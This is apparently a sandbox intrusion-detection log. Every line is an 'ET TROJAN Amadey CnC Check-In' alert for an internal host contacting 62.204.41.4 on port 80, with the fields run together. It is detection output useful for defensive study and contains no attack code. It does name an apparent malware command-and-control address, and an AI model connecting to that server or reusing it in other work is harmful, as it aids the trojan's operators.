                                                                      192.168.2.762.204.41.449981802027700 02/06/23-18:37:07.544608TCP2027700ET TROJAN Amadey CnC Check-In4998180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449941802027700 02/06/23-18:36:57.711371TCP2027700ET TROJAN Amadey CnC Check-In4994180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450318802027700 02/06/23-18:38:37.320679TCP2027700ET TROJAN Amadey CnC Check-In5031880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450346802027700 02/06/23-18:38:45.811035TCP2027700ET TROJAN Amadey CnC Check-In5034680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449956802027700 02/06/23-18:37:01.309389TCP2027700ET TROJAN Amadey CnC Check-In4995680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450030802027700 02/06/23-18:37:21.969699TCP2027700ET TROJAN Amadey CnC Check-In5003080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449763802027700 02/06/23-18:36:07.067396TCP2027700ET TROJAN Amadey CnC Check-In4976380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450315802027700 02/06/23-18:38:36.612364TCP2027700ET TROJAN Amadey CnC Check-In5031580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449778802027700 02/06/23-18:36:10.754396TCP2027700ET TROJAN Amadey CnC Check-In4977880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449800802027700 02/06/23-18:36:16.519327TCP2027700ET TROJAN Amadey CnC Check-In4980080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449971802027700 02/06/23-18:37:04.988037TCP2027700ET TROJAN Amadey CnC Check-In4997180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450122802027700 02/06/23-18:37:45.289416TCP2027700ET TROJAN Amadey CnC Check-In5012280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450278802027700 02/06/23-18:38:27.635526TCP2027700ET TROJAN Amadey CnC Check-In5027880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450107802027700 02/06/23-18:37:41.653833TCP2027700ET TROJAN Amadey CnC Check-In5010780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450022802027700 02/06/23-18:37:20.029901TCP2027700ET TROJAN Amadey CnC Check-In5002280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449752802027700 02/06/23-18:36:04.410535TCP2027700ET TROJAN Amadey CnC Check-In4975280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450313802027700 02/06/23-18:38:36.114307TCP2027700ET TROJAN Amadey CnC Check-In5031380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450241802027700 02/06/23-18:38:17.040111TCP2027700ET TROJAN Amadey CnC Check-In5024180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449865802027700 02/06/23-18:36:32.990534TCP2027700ET TROJAN Amadey CnC Check-In4986580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450193802027700 02/06/23-18:38:03.846258TCP2027700ET TROJAN Amadey CnC Check-In5019380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450200802027700 02/06/23-18:38:05.567462TCP2027700ET TROJAN Amadey CnC Check-In5020080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449735802027700 02/06/23-18:36:00.278415TCP2027700ET TROJAN Amadey CnC Check-In4973580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449913802027700 02/06/23-18:36:48.947846TCP2027700ET TROJAN Amadey CnC Check-In4991380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450063802027700 02/06/23-18:37:29.786603TCP2027700ET TROJAN Amadey CnC Check-In5006380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449760802027700 02/06/23-18:36:06.332167TCP2027700ET TROJAN Amadey CnC Check-In4976080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450213802027700 02/06/23-18:38:10.266408TCP2027700ET TROJAN Amadey CnC Check-In5021380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450343802027700 02/06/23-18:38:43.443139TCP2027700ET TROJAN Amadey CnC Check-In5034380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450354802027700 02/06/23-18:38:47.820987TCP2027700ET TROJAN Amadey CnC Check-In5035480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449765802027700 02/06/23-18:36:07.550649TCP2027700ET TROJAN Amadey CnC Check-In4976580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449902802027700 02/06/23-18:36:43.303336TCP2027700ET TROJAN Amadey CnC Check-In4990280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449943802027700 02/06/23-18:36:58.182256TCP2027700ET TROJAN Amadey CnC Check-In4994380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449984802027700 02/06/23-18:37:08.277099TCP2027700ET TROJAN Amadey CnC Check-In4998480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450135802027700 02/06/23-18:37:49.197725TCP2027700ET TROJAN Amadey CnC Check-In5013580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450176802027700 02/06/23-18:37:59.752747TCP2027700ET TROJAN Amadey CnC Check-In5017680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449964802027700 02/06/23-18:37:03.280174TCP2027700ET TROJAN Amadey CnC Check-In4996480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450298802027700 02/06/23-18:38:32.460707TCP2027700ET TROJAN Amadey CnC Check-In5029880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450326802027700 02/06/23-18:38:39.035983TCP2027700ET TROJAN Amadey CnC Check-In5032680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449768802027700 02/06/23-18:36:08.295559TCP2027700ET TROJAN Amadey CnC Check-In4976880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449875802027700 02/06/23-18:36:36.759662TCP2027700ET TROJAN Amadey CnC Check-In4987580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450142802027700 02/06/23-18:37:51.625961TCP2027700ET TROJAN Amadey CnC Check-In5014280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450320802027700 02/06/23-18:38:37.801532TCP2027700ET TROJAN Amadey CnC Check-In5032080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449786802027700 02/06/23-18:36:12.426489TCP2027700ET TROJAN Amadey CnC Check-In4978680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450231802027700 02/06/23-18:38:14.609316TCP2027700ET TROJAN Amadey CnC Check-In5023180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450308802027700 02/06/23-18:38:34.900026TCP2027700ET TROJAN Amadey CnC Check-In5030880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450160802027700 02/06/23-18:37:55.923634TCP2027700ET TROJAN Amadey CnC Check-In5016080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449992802027700 02/06/23-18:37:10.200128TCP2027700ET TROJAN Amadey CnC Check-In4999280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450053802027700 02/06/23-18:37:27.528345TCP2027700ET TROJAN Amadey CnC Check-In5005380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449829802027700 02/06/23-18:36:24.582432TCP2027700ET TROJAN Amadey CnC Check-In4982980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450219802027700 02/06/23-18:38:11.691917TCP2027700ET TROJAN Amadey CnC Check-In5021980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450071802027700 02/06/23-18:37:33.042572TCP2027700ET TROJAN Amadey CnC Check-In5007180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449918802027700 02/06/23-18:36:50.149978TCP2027700ET TROJAN Amadey CnC Check-In4991880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449930802027700 02/06/23-18:36:55.312009TCP2027700ET TROJAN Amadey CnC Check-In4993080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450059802027700 02/06/23-18:37:28.737026TCP2027700ET TROJAN Amadey CnC Check-In5005980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450237802027700 02/06/23-18:38:16.048099TCP2027700ET TROJAN Amadey CnC Check-In5023780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449841802027700 02/06/23-18:36:27.522197TCP2027700ET TROJAN Amadey CnC Check-In4984180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450148802027700 02/06/23-18:37:53.070956TCP2027700ET TROJAN Amadey CnC Check-In5014880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450025802027700 02/06/23-18:37:20.761388TCP2027700ET TROJAN Amadey CnC Check-In5002580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449974802027700 02/06/23-18:37:05.733543TCP2027700ET TROJAN Amadey CnC Check-In4997480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450310802027700 02/06/23-18:38:35.397050TCP2027700ET TROJAN Amadey CnC Check-In5031080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450221802027700 02/06/23-18:38:12.187048TCP2027700ET TROJAN Amadey CnC Check-In5022180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449885802027700 02/06/23-18:36:39.224150TCP2027700ET TROJAN Amadey CnC Check-In4988580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450203802027700 02/06/23-18:38:06.492874TCP2027700ET TROJAN Amadey CnC Check-In5020380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449796802027700 02/06/23-18:36:14.772959TCP2027700ET TROJAN Amadey CnC Check-In4979680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450114802027700 02/06/23-18:37:43.360834TCP2027700ET TROJAN Amadey CnC Check-In5011480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450091802027700 02/06/23-18:37:37.888527TCP2027700ET TROJAN Amadey CnC Check-In5009180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450043802027700 02/06/23-18:37:25.122543TCP2027700ET TROJAN Amadey CnC Check-In5004380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449946802027700 02/06/23-18:36:58.902146TCP2027700ET TROJAN Amadey CnC Check-In4994680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450132802027700 02/06/23-18:37:47.847648TCP2027700ET TROJAN Amadey CnC Check-In5013280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449857802027700 02/06/23-18:36:31.085635TCP2027700ET TROJAN Amadey CnC Check-In4985780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450002802027700 02/06/23-18:37:14.985690TCP2027700ET TROJAN Amadey CnC Check-In5000280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450209802027700 02/06/23-18:38:09.315255TCP2027700ET TROJAN Amadey CnC Check-In5020980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449987802027700 02/06/23-18:37:08.994236TCP2027700ET TROJAN Amadey CnC Check-In4998780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450104802027700 02/06/23-18:37:40.952667TCP2027700ET TROJAN Amadey CnC Check-In5010480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450101802027700 02/06/23-18:37:40.235234TCP2027700ET TROJAN Amadey CnC Check-In5010180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449831802027700 02/06/23-18:36:25.110774TCP2027700ET TROJAN Amadey CnC Check-In4983180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449834802027700 02/06/23-18:36:25.833187TCP2027700ET TROJAN Amadey CnC Check-In4983480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450012802027700 02/06/23-18:37:17.535420TCP2027700ET TROJAN Amadey CnC Check-In5001280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450015802027700 02/06/23-18:37:18.281532TCP2027700ET TROJAN Amadey CnC Check-In5001580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450364802027700 02/06/23-18:38:50.253164TCP2027700ET TROJAN Amadey CnC Check-In5036480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449923802027700 02/06/23-18:36:51.342928TCP2027700ET TROJAN Amadey CnC Check-In4992380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449742802027700 02/06/23-18:36:01.986509TCP2027700ET TROJAN Amadey CnC Check-In4974280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450272802027700 02/06/23-18:38:24.734925TCP2027700ET TROJAN Amadey CnC Check-In5027280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450349802027700 02/06/23-18:38:46.552442TCP2027700ET TROJAN Amadey CnC Check-In5034980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450361802027700 02/06/23-18:38:49.540296TCP2027700ET TROJAN Amadey CnC Check-In5036180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449745802027700 02/06/23-18:36:02.707219TCP2027700ET TROJAN Amadey CnC Check-In4974580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450094802027700 02/06/23-18:37:38.590484TCP2027700ET TROJAN Amadey CnC Check-In5009480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450097802027700 02/06/23-18:37:39.294548TCP2027700ET TROJAN Amadey CnC Check-In5009780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450186802027700 02/06/23-18:38:02.145296TCP2027700ET TROJAN Amadey CnC Check-In5018680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450183802027700 02/06/23-18:38:01.423474TCP2027700ET TROJAN Amadey CnC Check-In5018380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449803802027700 02/06/23-18:36:18.277310TCP2027700ET TROJAN Amadey CnC Check-In4980380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449770802027700 02/06/23-18:36:08.800628TCP2027700ET TROJAN Amadey CnC Check-In4977080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450275802027700 02/06/23-18:38:26.060580TCP2027700ET TROJAN Amadey CnC Check-In5027580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449758802027700 02/06/23-18:36:05.847456TCP2027700ET TROJAN Amadey CnC Check-In4975880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449977802027700 02/06/23-18:37:06.464355TCP2027700ET TROJAN Amadey CnC Check-In4997780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450028802027700 02/06/23-18:37:21.493237TCP2027700ET TROJAN Amadey CnC Check-In5002880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450158802027700 02/06/23-18:37:55.451859TCP2027700ET TROJAN Amadey CnC Check-In5015880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450117802027700 02/06/23-18:37:44.099592TCP2027700ET TROJAN Amadey CnC Check-In5011780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450336802027700 02/06/23-18:38:41.486984TCP2027700ET TROJAN Amadey CnC Check-In5033680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450288802027700 02/06/23-18:38:30.033697TCP2027700ET TROJAN Amadey CnC Check-In5028880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450286802027700 02/06/23-18:38:29.567763TCP2027700ET TROJAN Amadey CnC Check-In5028680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450188802027700 02/06/23-18:38:02.626278TCP2027700ET TROJAN Amadey CnC Check-In5018880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449976802027700 02/06/23-18:37:06.213926TCP2027700ET TROJAN Amadey CnC Check-In4997680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450029802027700 02/06/23-18:37:21.731774TCP2027700ET TROJAN Amadey CnC Check-In5002980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449820802027700 02/06/23-18:36:22.420698TCP2027700ET TROJAN Amadey CnC Check-In4982080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449958802027700 02/06/23-18:37:01.789883TCP2027700ET TROJAN Amadey CnC Check-In4995880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450258802027700 02/06/23-18:38:21.134137TCP2027700ET TROJAN Amadey CnC Check-In5025880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450102802027700 02/06/23-18:37:40.471333TCP2027700ET TROJAN Amadey CnC Check-In5010280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449798802027700 02/06/23-18:36:15.438757TCP2027700ET TROJAN Amadey CnC Check-In4979880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449740802027700 02/06/23-18:36:01.508139TCP2027700ET TROJAN Amadey CnC Check-In4974080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449891802027700 02/06/23-18:36:40.650924TCP2027700ET TROJAN Amadey CnC Check-In4989180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449817802027700 02/06/23-18:36:21.693658TCP2027700ET TROJAN Amadey CnC Check-In4981780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450243802027700 02/06/23-18:38:17.517772TCP2027700ET TROJAN Amadey CnC Check-In5024380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450338802027700 02/06/23-18:38:41.974959TCP2027700ET TROJAN Amadey CnC Check-In5033880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449835802027700 02/06/23-18:36:26.067781TCP2027700ET TROJAN Amadey CnC Check-In4983580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450065802027700 02/06/23-18:37:30.338043TCP2027700ET TROJAN Amadey CnC Check-In5006580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450261802027700 02/06/23-18:38:21.845480TCP2027700ET TROJAN Amadey CnC Check-In5026180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450215802027700 02/06/23-18:38:10.750044TCP2027700ET TROJAN Amadey CnC Check-In5021580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450083802027700 02/06/23-18:37:35.944831TCP2027700ET TROJAN Amadey CnC Check-In5008380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450019802027700 02/06/23-18:37:19.314761TCP2027700ET TROJAN Amadey CnC Check-In5001980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449986802027700 02/06/23-18:37:08.750839TCP2027700ET TROJAN Amadey CnC Check-In4998680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450120802027700 02/06/23-18:37:44.810267TCP2027700ET TROJAN Amadey CnC Check-In5012080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450014802027700 02/06/23-18:37:18.030710TCP2027700ET TROJAN Amadey CnC Check-In5001480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449881802027700 02/06/23-18:36:38.196455TCP2027700ET TROJAN Amadey CnC Check-In4988180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449886802027700 02/06/23-18:36:39.465156TCP2027700ET TROJAN Amadey CnC Check-In4988680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450037802027700 02/06/23-18:37:23.652171TCP2027700ET TROJAN Amadey CnC Check-In5003780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450055802027700 02/06/23-18:37:27.766285TCP2027700ET TROJAN Amadey CnC Check-In5005580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450233802027700 02/06/23-18:38:15.078905TCP2027700ET TROJAN Amadey CnC Check-In5023380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449935802027700 02/06/23-18:36:56.304075TCP2027700ET TROJAN Amadey CnC Check-In4993580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450171802027700 02/06/23-18:37:58.553511TCP2027700ET TROJAN Amadey CnC Check-In5017180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450202802027700 02/06/23-18:38:06.231570TCP2027700ET TROJAN Amadey CnC Check-In5020280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450085802027700 02/06/23-18:37:36.424991TCP2027700ET TROJAN Amadey CnC Check-In5008580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449843802027700 02/06/23-18:36:28.008839TCP2027700ET TROJAN Amadey CnC Check-In4984380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450263802027700 02/06/23-18:38:22.311708TCP2027700ET TROJAN Amadey CnC Check-In5026380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450248802027700 02/06/23-18:38:18.734487TCP2027700ET TROJAN Amadey CnC Check-In5024880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450284802027700 02/06/23-18:38:29.098650TCP2027700ET TROJAN Amadey CnC Check-In5028480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449871802027700 02/06/23-18:36:35.146966TCP2027700ET TROJAN Amadey CnC Check-In4987180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450027802027700 02/06/23-18:37:21.251923TCP2027700ET TROJAN Amadey CnC Check-In5002780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449757802027700 02/06/23-18:36:05.614238TCP2027700ET TROJAN Amadey CnC Check-In4975780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449876802027700 02/06/23-18:36:37.001689TCP2027700ET TROJAN Amadey CnC Check-In4987680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450198802027700 02/06/23-18:38:05.080347TCP2027700ET TROJAN Amadey CnC Check-In5019880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449873802027700 02/06/23-18:36:36.003660TCP2027700ET TROJAN Amadey CnC Check-In4987380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450024802027700 02/06/23-18:37:20.506098TCP2027700ET TROJAN Amadey CnC Check-In5002480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450205802027700 02/06/23-18:38:07.442403TCP2027700ET TROJAN Amadey CnC Check-In5020580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449948802027700 02/06/23-18:36:59.384504TCP2027700ET TROJAN Amadey CnC Check-In4994880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450057802027700 02/06/23-18:37:28.262420TCP2027700ET TROJAN Amadey CnC Check-In5005780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449729802027700 02/06/23-18:35:57.348763TCP2027700ET TROJAN Amadey CnC Check-In4972980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449907802027700 02/06/23-18:36:47.522865TCP2027700ET TROJAN Amadey CnC Check-In4990780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450098802027700 02/06/23-18:37:39.529541TCP2027700ET TROJAN Amadey CnC Check-In5009880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450235802027700 02/06/23-18:38:15.569378TCP2027700ET TROJAN Amadey CnC Check-In5023580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449830802027700 02/06/23-18:36:24.829107TCP2027700ET TROJAN Amadey CnC Check-In4983080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449989802027700 02/06/23-18:37:09.476584TCP2027700ET TROJAN Amadey CnC Check-In4998980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450016802027700 02/06/23-18:37:18.532774TCP2027700ET TROJAN Amadey CnC Check-In5001680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450207802027700 02/06/23-18:38:08.630704TCP2027700ET TROJAN Amadey CnC Check-In5020780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450276802027700 02/06/23-18:38:26.300126TCP2027700ET TROJAN Amadey CnC Check-In5027680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449848802027700 02/06/23-18:36:28.944538TCP2027700ET TROJAN Amadey CnC Check-In4984880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450230802027700 02/06/23-18:38:14.375521TCP2027700ET TROJAN Amadey CnC Check-In5023080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450271802027700 02/06/23-18:38:24.266112TCP2027700ET TROJAN Amadey CnC Check-In5027180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450100802027700 02/06/23-18:37:39.998889TCP2027700ET TROJAN Amadey CnC Check-In5010080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449807802027700 02/06/23-18:36:19.287197TCP2027700ET TROJAN Amadey CnC Check-In4980780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449978802027700 02/06/23-18:37:06.699430TCP2027700ET TROJAN Amadey CnC Check-In4997880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450093802027700 02/06/23-18:37:38.357594TCP2027700ET TROJAN Amadey CnC Check-In5009380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450129802027700 02/06/23-18:37:46.992346TCP2027700ET TROJAN Amadey CnC Check-In5012980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449730802027700 02/06/23-18:35:58.016249TCP2027700ET TROJAN Amadey CnC Check-In4973080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450052802027700 02/06/23-18:37:27.283164TCP2027700ET TROJAN Amadey CnC Check-In5005280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450307802027700 02/06/23-18:38:34.659310TCP2027700ET TROJAN Amadey CnC Check-In5030780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450348802027700 02/06/23-18:38:46.302644TCP2027700ET TROJAN Amadey CnC Check-In5034880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449866802027700 02/06/23-18:36:33.225481TCP2027700ET TROJAN Amadey CnC Check-In4986680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450139802027700 02/06/23-18:37:50.922595TCP2027700ET TROJAN Amadey CnC Check-In5013980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449860802027700 02/06/23-18:36:31.786991TCP2027700ET TROJAN Amadey CnC Check-In4986080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449777802027700 02/06/23-18:36:10.512879TCP2027700ET TROJAN Amadey CnC Check-In4977780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450228802027700 02/06/23-18:38:13.886569TCP2027700ET TROJAN Amadey CnC Check-In5022880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449955802027700 02/06/23-18:37:01.055369TCP2027700ET TROJAN Amadey CnC Check-In4995580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450090802027700 02/06/23-18:37:37.652979TCP2027700ET TROJAN Amadey CnC Check-In5009080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449973802027700 02/06/23-18:37:05.465390TCP2027700ET TROJAN Amadey CnC Check-In4997380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450240802027700 02/06/23-18:38:16.797444TCP2027700ET TROJAN Amadey CnC Check-In5024080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450311802027700 02/06/23-18:38:35.648201TCP2027700ET TROJAN Amadey CnC Check-In5031180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449884802027700 02/06/23-18:36:38.947006TCP2027700ET TROJAN Amadey CnC Check-In4988480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450044802027700 02/06/23-18:37:25.381632TCP2027700ET TROJAN Amadey CnC Check-In5004480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450222802027700 02/06/23-18:38:12.425383TCP2027700ET TROJAN Amadey CnC Check-In5022280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450133802027700 02/06/23-18:37:48.134151TCP2027700ET TROJAN Amadey CnC Check-In5013380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449795802027700 02/06/23-18:36:14.536822TCP2027700ET TROJAN Amadey CnC Check-In4979580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449838802027700 02/06/23-18:36:26.789629TCP2027700ET TROJAN Amadey CnC Check-In4983880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450151802027700 02/06/23-18:37:53.780649TCP2027700ET TROJAN Amadey CnC Check-In5015180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449927802027700 02/06/23-18:36:52.819701TCP2027700ET TROJAN Amadey CnC Check-In4992780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450062802027700 02/06/23-18:37:29.485225TCP2027700ET TROJAN Amadey CnC Check-In5006280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450317802027700 02/06/23-18:38:37.080325TCP2027700ET TROJAN Amadey CnC Check-In5031780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449726802027700 02/06/23-18:35:56.260662TCP2027700ET TROJAN Amadey CnC Check-In4972680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449850802027700 02/06/23-18:36:29.439544TCP2027700ET TROJAN Amadey CnC Check-In4985080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450279802027700 02/06/23-18:38:27.884547TCP2027700ET TROJAN Amadey CnC Check-In5027980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449945802027700 02/06/23-18:36:58.654499TCP2027700ET TROJAN Amadey CnC Check-In4994580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450149802027700 02/06/23-18:37:53.313477TCP2027700ET TROJAN Amadey CnC Check-In5014980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450345802027700 02/06/23-18:38:44.689333TCP2027700ET TROJAN Amadey CnC Check-In5034580192.168.2.762.204.41.4
